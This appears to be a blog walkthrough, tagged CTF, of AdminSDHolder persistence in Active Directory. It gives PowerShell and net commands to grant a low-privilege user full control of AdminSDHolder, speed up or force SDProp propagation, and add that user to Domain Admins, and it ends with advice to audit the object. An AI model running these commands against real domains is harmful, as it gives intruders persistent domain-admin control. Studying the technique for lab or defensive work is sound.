CTF

If we have high privilege access to a domain, we will likely want to establish persistence with high privilege access. One mechanism to do this is to assign ourselves permissions to the adminSDHolder object in active directory:

Graphical user interface, application

Description automatically generated

Here we have the default adminSDHolder permissions. We are going to add our user “low” in here with modify or full control permissions:

Graphical user interface, application

Description automatically generated

Now this can be changed via other automated methods such as PowerShell using PowerSpolit:

https://powersploit.readthedocs.io/en/latest/Recon/Add-DomainObjectAcl/

Add-DomainObjectAcl -TargetIdentity “CN=AdminSDHolder,CN=System, DC=smallbiz,DC=local” -PrincipalIdentity low -Rights All

This object is used as a template to apply permissions to a range of groups:

Domain Admins

Administrator

Administrators

Account Operators

Enterprise Admins

Backup Operators

Domain Controllers

Krbtgt

Print Operators

Read-only Domain Controllers

Replicator

Schema Admins

Server Operators

Now in 60 minutes time the SDProp process will run applying these permissions to the protected groups, since we modified the adminSDHolder object (the permissions for this act as a template) every 60 minutes (default which can be changed) permissions will be re-applied to the protected groups, this time round it will give us the ability to modify those groups/objects. This will enable us to have full control of the domain.

We can trigger this using ldp.exe

https://docs.microsoft.com/en-us/previous-versions/technet-magazine/ee361593(v=msdn.10)?redirectedfrom=MSDN

or we can do this via this PowerShell module:

https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1

and finally, since we are privileged account to start with, we could change the registry key on a domain controller:

HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters

We can set this using powershell:

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters -Name AdminSDProtectFrequency -Value 60

The value is the number of seconds this process is triggered on a domain controller (the default is 60 minutes)

Graphical user interface, application

Description automatically generated

PowerShell Example

I’ve taken the PowersShell above and given it my own twist:

#Get the domain name from the current machines domain membership from wmi win32_computersystem domain object

$DomainName = Get-WmiObject -Namespace root\cimv2 -Class Win32_ComputerSystem | Select Domain

$DomainName

write-host “Forcing SD Propegation” -ForegroundColor Green

$DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext(‘domain’,$DomainName.Domain)

$DomainContext

$DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)

$DomainObject

write-host “FSMO – Primary Domain Controller Emulator (PDC Emulator) is $($DomainObject.PdcRoleOwner.Name).” -ForegroundColor Green

#get the PDCEmulator OS Version

$PDCEVersion = Get-WmiObject Win32_OperatingSystem -ComputerName $DomainObject.PdcRoleOwner.Name

#set the right task name (manual task at the minute)

$PDCEVersion.Version

if($PDCEVersion.Version -le 5){

write-host “Windows 2003 or 2000” -ForegroundColor Red

$TaskName = “FixUpInheritance” # Server 2000 and Server 2003

}

else

{write-host “Windows 2008 or Later” -ForegroundColor Red

$TaskName = “RunProtectAdminGroupsTask” #Server 2008 and Later

}

$RootDSE = New-Object System.DirectoryServices.DirectoryEntry(“LDAP://$($DomainObject.PdcRoleOwner.Name)/RootDSE”)

$RootDSE

$RootDSE.UsePropertyCache = $false

#Execute the action

$RootDSE.Put($TaskName, “1”)

$RootDSE.SetInfo()

Execution

Once the SD Propagation Task has run the permissions on the protected objects will have been updated as so:

Graphical user interface, application, Word

Description automatically generated

Escalation

Now we have the position where our account “low” who is not a member of the domain admins group can elevate:

Backdoor yourself into the domain admins group

net group “Domain Admins” low /domain /add

Now just a note there are other ways of changing groups e.g. using ADSI or PowerShell cmdlets.

To show this we’ve launched a process as “low” and added ourselves to the domain admins group:

Graphical user interface

Description automatically generated

We’ve shown the whoami /groups output to show that our session was NOT in domain amdins.

However, after running the net group command, we now look in ADUC:

Graphical user interface, text, application

Description automatically generated

Summary

As you can see the AdminSDHolder object can be tampered with to provide domain level persistence, clearly this objects permissions and changes should be audited and monitored for unauthorised changes.

Leave a Reply